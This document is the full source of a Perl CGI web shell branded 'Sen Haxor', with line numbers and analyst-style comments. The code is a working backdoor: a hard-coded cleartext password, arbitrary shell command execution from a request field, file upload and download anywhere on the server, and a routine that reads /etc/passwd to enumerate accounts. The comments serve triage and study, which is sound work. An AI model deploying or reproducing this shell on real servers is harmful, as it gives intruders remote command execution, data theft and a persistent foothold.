  1. #!/usr/bin/perl -I/usr/local/bandmin
# Global settings for the CGI shell. The script runs without strict/warnings,
# so every variable below is a package global shared by all of the subs.
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
# Seconds before ExecuteCommand's SIGALRM handler aborts a running command.
  4. $CommandTimeoutDuration = 300;
  5. $ShowDynamicOutput = 1;
# Hard-coded cleartext access password. The main program compares both the
# 'p' form field and the SAVEDPWD cookie against it with a plain string eq.
  6. $password = "libero";
# $WinNT is never assigned anywhere in this listing, so each of the following
# ternaries takes its Unix branch.
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
# Appended to executed commands so that stderr is merged into captured stdout.
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
# Parses the CGI request into the package hash %in. The main program calls it
# as `&ReadParse;` with an empty @_, so the optional glob argument is unused
# and %in is filled directly.
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15. 
# Scalar-context match: 1 when the request is multipart/form-data, else "".
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17. 
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
# Bitwise & stands in for a logical and; since $WinNT is never set in this
# listing the binmode is effectively never applied.
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
# Reads exactly CONTENT_LENGTH bytes of the POST body into $in.
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27. 
  28. # handle file upload data
  29. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  30. {
  31. $Boundary = '--'.$1; # please refer to RFC1867
# The boundary is interpolated into the split pattern without quotemeta.
  32. @list = split(/$Boundary/, $in);
# The first part is taken to be the uploaded file: everything before the
# blank line is its header, everything after it the raw file bytes.
  33. $HeaderBody = $list[1];
  34. $HeaderBody =~ /\r\n\r\n|\n\n/;
  35. $Header = $`;
  36. $Body = $';
  37. $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  38. $in{'filedata'} = $Body;
# The client-supplied filename lands in $in{'f'} with only quotes and
# whitespace removed; no further checking happens in this sub.
  39. $Header =~ /filename=\"(.+)\"/;
  40. $in{'f'} = $1;
  41. $in{'f'} =~ s/\"//g;
  42. $in{'f'} =~ s/\s//g;
  43. 
  44. # parse trailer
# Remaining parts become ordinary fields: the quoted word after "name=" is
# the key, the text following it (leading blank line and trailing newline
# stripped, then %xx-decoded) is the value.
  45. for($i=2; $list[$i]; $i++)
  46. {
  47. $list[$i] =~ s/^.+name=$//;
  48. $list[$i] =~ /\"(\w+)\"/;
  49. $key = $1;
  50. $val = $';
  51. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  52. $val =~ s/%(..)/pack("c", hex($1))/ge;
  53. $in{$key} = $val;
  54. }
  55. }
  56. else # standard post data (url encoded, not multipart)
  57. {
  58. @in = split(/&/, $in);
  59. foreach $i (0 .. $#in)
  60. {
  61. $in[$i] =~ s/\+/ /g;
  62. ($key, $val) = split(/=/, $in[$i], 2);
  63. $key =~ s/%(..)/pack("c", hex($1))/ge;
  64. $val =~ s/%(..)/pack("c", hex($1))/ge;
# A key that appears more than once has its values joined with a NUL byte.
  65. $in{$key} .= "\0" if (defined($in{$key}));
  66. $in{$key} .= $val;
  67. }
  68. }
  69. }
  70.  
  71. #------------------------------------------------------------------------------
  72. # Prints the HTML Page Header
  73. # Argument 1: Form item name to which focus should be set
  74. #------------------------------------------------------------------------------
  75. sub foo
  76. {
# Reads the local /etc/passwd and returns a hashref keyed by login name that
# holds each account's uid, gid and home directory. The banner comment above
# describes PrintPageHeader, not this sub, and nothing in this listing calls
# foo(); its presence (an account enumeration helper) is itself notable when
# triaging the file. Uses a bareword filehandle and 2-arg open.
  77. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  78. 
  79. my %HoH = ();
  80. 
  81. my $file = '/etc/passwd';
  82. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  83. 
# split on ':' with no string argument operates on $_ (the current line).
  84. while( <PASSWD> ) {
  85. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  86. 
  87. $HoH{ $login }{ 'uid' } = $uid;
  88. $HoH{ $login }{ 'gid' } = $gid;
  89. $HoH{ $login }{ 'dir' } = $dir;
  90. }
  91. 
  92. close PASSWD;
  93. 
  94. return \%HoH;
  95. }
  96. sub PrintPageHeader
  97. {
# Prints the CGI Content-type header followed by the page head and nav bar.
# Callers pass a form-field name as argument 1, but @_ is never read here.
# $HtmlMetaHeader is only assigned by PrintDownloadLinkPage; otherwise the
# interpolation below prints an empty line.
# Percent-encode every non-alphanumeric byte of $CurrentDir for the links.
  98. $EncodedCurrentDir = $CurrentDir;
  99. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  100. print "Content-type: text/html\n\n";
# The heredoc contains fixed strings (page title, remote background image
# URL) that identify this shell in served responses; $ServerName is
# interpolated unescaped.
  101. print <<END;
  102. <html>
  103. <head>
  104. <title>Sen Haxor ~ CGI Shell</title>
  105. $HtmlMetaHeader
  106. </head>
  107. <body style='color: #000000;background:url(http://i48.tinypic.com/29fcoec.png) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  108. <td colspan="2" bgcolor="black"><p align="center">s<font face="Verdana" size="2">
  109. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  110. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  111. <a href="$ScriptLocation?a=logout">Disconnect</a>
  112. <table border="0" width="100%" cellspacing="0" cellpadding="2">
  113. <p align="center"><font face="Verdana" size="3" color="#FF0000">root~Sen Haxor - Server:: <font color="gray">$ServerName</font></font>
  114. </tr>
  115. <tr>
  116. </font></td>
  117. </tr>
  118. </table>
  119. <font color="#C0C0C0" size="3">
  120. END
  121. }
  122.  
  123. #------------------------------------------------------------------------------
  124. # Prints the Login Screen
  125. #------------------------------------------------------------------------------
  126. sub PrintLoginScreen
  127. {
# Builds the login banner as a q$...$ single-quoted string (the '$' is the
# delimiter, so the string runs to the lone "$;" line) and prints it through
# a heredoc. The "#'" line is a comment, presumably to rebalance editor
# syntax highlighting after the unusual delimiter.
  128. $Message = q$<pre><font color="red">
  129. -- Enter Password --
  130. </font></pre>
  131. $;
  132. #'
  133. print <<END;
  134. $Message
  135. END
  136. }
  137.  
  138. #------------------------------------------------------------------------------
  139. # Prints the message that informs the user of a failed login
  140. #------------------------------------------------------------------------------
  141. sub PrintLoginFailedMessage
  142. {
# Prints a static "Login incorrect" block styled like a terminal transcript;
# the "admin" user name shown is decorative and not checked anywhere.
  143. print <<END;
  144. <code>
  145. <br>login: admin<br>
  146. password:<br>
  147. Login incorrect<br><br>
  148. </code>
  149. END
  150. }
  151.  
  152. #------------------------------------------------------------------------------
  153. # Prints the HTML form for logging in
  154. #------------------------------------------------------------------------------
  155. sub PrintLoginForm
  156. {
# Prints the password form. It POSTs back to $ScriptLocation with the hidden
# field a=login and the password in field p, which PerformLogin reads.
  157. print <<END;
  158. <code>
  159. <form name="f" method="POST" action="$ScriptLocation">
  160. <input type="hidden" name="a" value="login"><font color="red">Password : </font><input type="password" name="p">
  161. <input type="submit" value="Enter">
  162. </form>
  163. </code>
  164. END
  165. }
  166.  
  167. #------------------------------------------------------------------------------
  168. # Prints the footer for the HTML Page
  169. #------------------------------------------------------------------------------
  170. sub PrintPageFooter
  171. {
# Closes the <font> opened in PrintPageHeader and ends the document.
  172. print "</font></body></html>";
  173. }
  174.  
  175. #------------------------------------------------------------------------------
  176. # Retrieves the values of all cookies. The cookies can be accessed using the
  177. # variable $Cookies{''}
  178. #------------------------------------------------------------------------------
  179. sub GetCookies
  180. {
# Splits HTTP_COOKIE on "; " and stores each name/value in the package hash
# %Cookies. The list assignment keeps only the first two pieces of the
# unlimited split, so a cookie value containing '=' is truncated there.
  181. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  182. foreach $cookie(@httpcookies)
  183. {
  184. ($id, $val) = split(/=/, $cookie);
  185. $Cookies{$id} = $val;
  186. }
  187. }
  188.  
  189. #------------------------------------------------------------------------------
  190. # Prints the screen when the user logs out
  191. #------------------------------------------------------------------------------
  192. sub PrintLogoutScreen
  193. {
# Static "connection closed" text shown by PerformLogout.
  194. print "<code>Connection closed by foreign host.<br><br></code>";
  195. }
  196.  
  197. #------------------------------------------------------------------------------
  198. # Logs out the user and allows the user to login again
  199. #------------------------------------------------------------------------------
  200. sub PerformLogout
  201. {
# Clears the SAVEDPWD cookie by re-setting it to an empty value. The
# Set-Cookie line is printed before PrintPageHeader emits Content-type, so it
# still forms part of the response headers. Then shows the login page again.
  202. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  203. &PrintPageHeader("p");
  204. &PrintLogoutScreen;
  205. &PrintLoginScreen;
  206. &PrintLoginForm;
  207. &PrintPageFooter;
  208. }
  209.  
  210. #------------------------------------------------------------------------------
  211. # This function is called to login the user. If the password matches, it
  212. # displays a page that allows the user to run commands. If the password doesn't
  213. # match or if no password is entered, it displays a form that allows the user
  214. # to login
  215. #------------------------------------------------------------------------------
  216. sub PerformLogin
  217. {
# Compares the submitted password ($LoginPassword, from the 'p' field) with
# the hard-coded $password using plain string equality. On success the
# password itself is stored in the SAVEDPWD cookie in cleartext, so every
# later request to this script carries it; the main program then treats
# the session as logged in. On failure the login form is shown again.
  218. if($LoginPassword eq $password) # password matched
  219. {
  220. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  221. &PrintPageHeader("c");
  222. &PrintCommandLineInputForm;
  223. &PrintPageFooter;
  224. }
  225. else # password didn't match
  226. {
  227. &PrintPageHeader("p");
  228. &PrintLoginScreen;
  229. if($LoginPassword ne "") # some password was entered
  230. {
  231. &PrintLoginFailedMessage;
  232. }
  233. &PrintLoginForm;
  234. &PrintPageFooter;
  235. }
  236. }
  237.  
  238. #------------------------------------------------------------------------------
  239. # Prints the HTML form that allows the user to enter commands
  240. #------------------------------------------------------------------------------
  241. sub PrintCommandLineInputForm
  242. {
# Prints the command form. It POSTs a=command, the current directory in the
# hidden field d, and the command text in field c back to $ScriptLocation.
# The prompt imitates a shell prompt with a fixed "admin" user name.
  243. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  244. print <<END;
  245. <code>
  246. <form name="f" method="POST" action="$ScriptLocation">
  247. <input type="hidden" name="a" value="command">
  248. <input type="hidden" name="d" value="$CurrentDir">
  249. <font color="red">$Prompt</font>
  250. <input type="text" name="c" size="25">
  251. <input type="submit" value="Enter">
  252. </form>
  253. </code>
  254. 
  255. END
  256. }
  257.  
  258. #------------------------------------------------------------------------------
  259. # Prints the HTML form that allows the user to download files
  260. #------------------------------------------------------------------------------
  261. sub PrintFileDownloadForm
  262. {
# Prints the download form: a=download, hidden d=$CurrentDir, and the
# requested file name in field f. Same prompt construction as the command form.
  263. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  264. print <<END;
  265. <code>
  266. <form name="f" method="POST" action="$ScriptLocation">
  267. <input type="hidden" name="d" value="$CurrentDir">
  268. <input type="hidden" name="a" value="download">
  269. $Prompt download<br><br>
  270. Filename: <input type="text" name="f" size="35"><br><br>
  271. Download: <input type="submit" value="Begin">
  272. </form>
  273. </code>
  274. END
  275. }
  276.  
  277. #------------------------------------------------------------------------------
  278. # Prints the HTML form that allows the user to upload files
  279. #------------------------------------------------------------------------------
  280. sub PrintFileUploadForm
  281. {
# Prints the multipart upload form: file field f, optional checkbox
# o=overwrite, hidden d=$CurrentDir and a=upload. ReadParse's multipart
# branch turns the file part into $in{'filedata'} and $in{'f'}.
  282. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  283. print <<END;
  284. <code>
  285. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  286. $Prompt upload<br><br>
  287. Filename: <input type="file" name="f" size="35"><br><br>
  288. Options: <input type="checkbox" name="o" value="overwrite">
  289. Overwrite if it Exists<br><br>
  290. Upload: <input type="submit" value="Begin">
  291. <input type="hidden" name="d" value="$CurrentDir">
  292. <input type="hidden" name="a" value="upload">
  293. </form>
  294. </code>
  295. END
  296. }
  297.  
  298. #------------------------------------------------------------------------------
  299. # This function is called when the timeout for a command expires. We need to
  300. # terminate the script immediately. This function is valid only on Unix. It is
  301. # never called when the script is running on NT.
  302. #------------------------------------------------------------------------------
  303. sub CommandTimeout
  304. {
# SIGALRM handler installed by ExecuteCommand. Cancels the alarm, reports
# the timeout, re-prints the command form and exits the CGI process; the
# child shell started by ExecuteCommand is not killed here. Note the heredoc
# closes with "<code>" where "</code>" looks intended (runtime string,
# left unchanged).
  305. if(!$WinNT)
  306. {
  307. alarm(0);
  308. print <<END;
  309. </xmp>
  310. <code>
  311. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  312. <br>Killed it!
  313. <code>
  314. END
  315. &PrintCommandLineInputForm;
  316. &PrintPageFooter;
  317. exit;
  318. }
  319. }
  320.  
  321. #------------------------------------------------------------------------------
  322. # This function is called to execute commands. It displays the output of the
  323. # command and allows the user to enter another command. The change directory
  324. # command is handled differently. In this case, the new directory is stored in
  325. # an internal variable and is used each time a command has to be executed. The
  326. # output of the change directory command is not displayed to the users
  327. # therefore error messages cannot be displayed.
  328. #------------------------------------------------------------------------------
  329. sub ExecuteCommand
  330. {
# Runs $RunCommand (the 'c' request field, taken verbatim) through the
# system shell and renders its output. A leading "cd" is special-cased: the
# new directory is obtained by running cd + $CmdPwd via backticks and kept in
# $CurrentDir, which the form then round-trips through the hidden 'd' field.
  331. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  332. {
  333. # we change the directory internally. The output of the
  334. # command is not displayed.
  335. 
  336. $OldDir = $CurrentDir;
# If the inner cd fails, pwd still prints the old directory, so
# $CurrentDir is left effectively unchanged.
  337. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  338. chop($CurrentDir = `$Command`);
  339. &PrintPageHeader("c");
  340. &PrintCommandLineInputForm;
  341. print "<div style='float: center; text-align: left;'>";
  342. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
  343. print "<code>$Prompt $RunCommand</code>";
  344. }
  345. else # some other command, display the output
  346. {
  347. &PrintPageHeader("c");
  348. &PrintCommandLineInputForm;
  349. print "<div style='float: center; text-align: left;'>";
  350. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
  351. print "<code>$Prompt $RunCommand</code><xmp style='color: #00FF00;'>";
# Every command is prefixed with a cd into $CurrentDir, joined with $CmdSep,
# and suffixed with $Redirector so stderr is captured too.
  352. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
# Unix only: abort via CommandTimeout after $CommandTimeoutDuration seconds.
  353. if(!$WinNT)
  354. {
  355. $SIG{'ALRM'} = \&CommandTimeout;
  356. alarm($CommandTimeoutDuration);
  357. }
  358. if($ShowDynamicOutput) # show output as it is generated
  359. {
# Unbuffered stdout; the trailing " |" makes the 2-arg open a pipe from the
# shell running $Command, whose lines are echoed as they arrive.
  360. $|=1;
  361. $Command .= " |";
  362. open(CommandOutput, $Command);
  363. while(<CommandOutput>)
  364. {
  365. $_ =~ s/(\n|\r\n)$//;
  366. print "$_\n";
  367. }
  368. $|=0;
  369. }
  370. else # show output after command completes
  371. {
  372. print `$Command`;
  373. }
  374. if(!$WinNT)
  375. {
  376. alarm(0);
  377. }
  378. print "</xmp>";
  379. }
  380. print "</div>";
  381. &PrintPageFooter;
  382. }
  383.  
  384. #------------------------------------------------------------------------------
  385. # This function displays the page that contains a link which allows the user
  386. # to download the specified file. The page also contains an auto-refresh
  387. # feature that starts the download automatically.
  388. # Argument 1: Fully qualified filename of the file to be downloaded
  389. #------------------------------------------------------------------------------
  390. sub PrintDownloadLinkPage
  391. {
# Argument 1: fully qualified path of the file (bound with local, not my).
# If the file exists, the path is percent-encoded into a download link that
# carries o=go, and a meta refresh set via $HtmlMetaHeader makes the browser
# follow it after one second. $TransferFile (the raw request value) is what
# the message displays. Otherwise the download form is shown with $!.
  392. local($FileUrl) = @_;
  393. if(-e $FileUrl) # if the file exists
  394. {
  395. # encode the file link so we can send it to the browser
  396. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  397. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  398. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  399. &PrintPageHeader("c");
  400. print <<END;
  401. <code>
  402. Sending File $TransferFile...<br>
  403. If the download does not start automatically,
  404. <a href="$DownloadLink">Click Here</a>.
  405. </code>
  406. END
  407. &PrintCommandLineInputForm;
  408. &PrintPageFooter;
  409. }
  410. else # file doesn't exist
  411. {
  412. &PrintPageHeader("f");
  413. print "<code>Failed to download $FileUrl: $!</code>";
  414. &PrintFileDownloadForm;
  415. &PrintPageFooter;
  416. }
  417. }
  418.  
  419. #------------------------------------------------------------------------------
  420. # This function reads the specified file from the disk and sends it to the
  421. # browser, so that it can be downloaded by the user.
  422. # Argument 1: Fully qualified pathname of the file to be sent.
  423. #------------------------------------------------------------------------------
  424. sub SendFileToBrowser
  425. {
# Argument 1: path of the file to stream (bound with local). Opens it with a
# 2-arg open, so the path string is also interpreted for mode characters,
# then emits it as an attachment with Content-Type application/x-unknown.
  426. local($SendFile) = @_;
  427. if(open(SENDFILE, $SendFile)) # file opened for reading
  428. {
  429. if($WinNT)
  430. {
  431. binmode(SENDFILE);
  432. binmode(STDOUT);
  433. }
# stat field 7 is the size in bytes.
  434. $FileSize = (stat($SendFile))[7];
# The match's $1 (the basename; '^' inside the class is literal, so it also
# cuts at a caret) is what the Content-Disposition header uses;
# $Filename itself is only a copy of the full path.
  435. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  436. print "Content-Type: application/x-unknown\n";
  437. print "Content-Length: $FileSize\n";
  438. print "Content-Disposition: attachment; filename=$1\n\n";
  439. print while(<SENDFILE>);
  440. close(SENDFILE);
  441. }
  442. else # failed to open file
  443. {
  444. &PrintPageHeader("f");
  445. print "<code>Failed to download $SendFile: $!</code>";
  446. &PrintFileDownloadForm;
  447. &PrintPageFooter;
  448. }
  449. }
  450.  
  451.  
  452. #------------------------------------------------------------------------------
  453. # This function is called when the user downloads a file. It displays a message
  454. # to the user and provides a link through which the file can be downloaded.
  455. # This function is also called when the user clicks on that link. In this case,
  456. # the file is read and sent to the browser.
  457. #------------------------------------------------------------------------------
  458. sub BeginDownload
  459. {
# Resolves $TransferFile against $CurrentDir unless it is already absolute,
# then either streams the file (o=go) or prints the link page. The main
# dispatch never calls this sub; DownloadFile below repeats the same logic
# after its empty-filename check. Bitwise & and | are used on the 1/""
# results of the regex matches in place of logical operators.
  460. # get fully qualified path of the file to be downloaded
  461. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  462. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  463. {
  464. $TargetFile = $TransferFile;
  465. }
  466. else # path is relative
  467. {
# Drop a trailing separator from the directory before appending the name.
  468. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  469. $TargetFile .= $PathSep.$TransferFile;
  470. }
  471. 
  472. if($Options eq "go") # we have to send the file
  473. {
  474. &SendFileToBrowser($TargetFile);
  475. }
  476. else # we have to send only the link page
  477. {
  478. &PrintDownloadLinkPage($TargetFile);
  479. }
  480. }
  481.  
  482. #------------------------------------------------------------------------------
  483. # This function is called when the user wants to upload a file. If the
  484. # file is not specified, it displays a form allowing the user to specify a
  485. # file, otherwise it starts the upload process.
  486. #------------------------------------------------------------------------------
  487. sub UploadFile
  488. {
# Writes the uploaded bytes in $in{'filedata'} to $CurrentDir joined with
# the basename of $TransferFile. An existing file is replaced only when the
# request carries o=overwrite. This is the file-drop path of the shell:
# a multipart POST with a=upload to this script. Uses a 2-arg open with a
# '>' prefix and a bareword filehandle.
  489. # if no file is specified, print the upload form again
  490. if($TransferFile eq "")
  491. {
  492. &PrintPageHeader("f");
  493. &PrintFileUploadForm;
  494. &PrintPageFooter;
  495. return;
  496. }
  497. &PrintPageHeader("c");
  498. 
  499. # start the uploading process
  500. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  501. 
  502. # get the fully qualified pathname of the file to be created
  503. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
# $1 from this match is the basename of the client-supplied file name.
  504. $TransferFile =~ m!([^/^\\]*)$!;
  505. $TargetName .= $PathSep.$1;
  506. 
  507. $TargetFileSize = length($in{'filedata'});
  508. # if the file exists and we are not supposed to overwrite it
  509. if(-e $TargetName && $Options ne "overwrite")
  510. {
  511. print "Failed: Destination file already exists.<br>";
  512. }
  513. else # file is not present
  514. {
  515. if(open(UPLOADFILE, ">$TargetName"))
  516. {
  517. binmode(UPLOADFILE) if $WinNT;
  518. print UPLOADFILE $in{'filedata'};
  519. close(UPLOADFILE);
  520. print "Transfered $TargetFileSize Bytes.<br>";
  521. print "File Path: $TargetName<br>";
  522. }
  523. else
  524. {
  525. print "Failed: $!<br>";
  526. }
  527. }
  528. print "</code>";
  529. &PrintCommandLineInputForm;
  530. &PrintPageFooter;
  531. }
  532.  
  533. #------------------------------------------------------------------------------
  534. # This function is called when the user wants to download a file. If the
  535. # filename is not specified, it displays a form allowing the user to specify a
  536. # file, otherwise it displays a message to the user and provides a link
  537. # through which the file can be downloaded.
  538. #------------------------------------------------------------------------------
  539. sub DownloadFile
  540. {
# Entry point for a=download. With no file name it shows the download form;
# otherwise it resolves $TransferFile (absolute, or relative to $CurrentDir)
# and either streams the file when o=go or prints the link page, whose meta
# refresh re-requests this action with o=go. The resolution and dispatch
# below duplicate BeginDownload.
  541. # if no file is specified, print the download form again
  542. if($TransferFile eq "")
  543. {
  544. &PrintPageHeader("f");
  545. &PrintFileDownloadForm;
  546. &PrintPageFooter;
  547. return;
  548. }
  549. 
  550. # get fully qualified path of the file to be downloaded
# Bitwise & and | applied to the 1/"" results of the regex matches.
  551. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  552. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  553. {
  554. $TargetFile = $TransferFile;
  555. }
  556. else # path is relative
  557. {
  558. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  559. $TargetFile .= $PathSep.$TransferFile;
  560. }
  561. 
  562. if($Options eq "go") # we have to send the file
  563. {
  564. &SendFileToBrowser($TargetFile);
  565. }
  566. else # we have to send only the link page
  567. {
  568. &PrintDownloadLinkPage($TargetFile);
  569. }
  570. }
  571.  
  572. #------------------------------------------------------------------------------
  573. # Main Program - Execution Starts Here
  574. #------------------------------------------------------------------------------
# `&Sub;` without parens passes the caller's @_ (empty at top level), so
# ReadParse fills the package hash %in directly.
  575. &ReadParse;
  576. &GetCookies;
  577. 
# Request fields map one-to-one onto the globals the subs read:
# p = password, c = command, f = file name, o = option, a = action, d = dir.
  578. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  579. $ServerName = $ENV{'SERVER_NAME'};
  580. $LoginPassword = $in{'p'};
  581. $RunCommand = $in{'c'};
  582. $TransferFile = $in{'f'};
  583. $Options = $in{'o'};
  584. 
  585. $Action = $in{'a'};
  586. $Action = "login" if($Action eq ""); # no action specified, use default
  587. 
  588. # get the directory in which the commands will be executed
# Taken from the request; when absent, the output of $CmdPwd (pwd) is used.
  589. $CurrentDir = $in{'d'};
  590. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  591. 
# Session check: the SAVEDPWD cookie must equal the hard-coded password
# (eq binds tighter than =, so $LoggedIn holds the comparison result).
  592. $LoggedIn = $Cookies{'SAVEDPWD'} eq $password;
  593. 
# Dispatch on the action. An unrecognised action from a logged-in client
# matches no branch and produces no output at all.
  594. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  595. {
  596. &PerformLogin;
  597. }
  598. elsif($Action eq "command") # user wants to run a command
  599. {
  600. &ExecuteCommand;
  601. }
  602. elsif($Action eq "upload") # user wants to upload a file
  603. {
  604. &UploadFile;
  605. }
  606. elsif($Action eq "download") # user wants to download a file
  607. {
  608. &DownloadFile;
  609. }
  610. elsif($Action eq "logout") # user wants to logout
  611. {
  612. &PerformLogout;
  613. }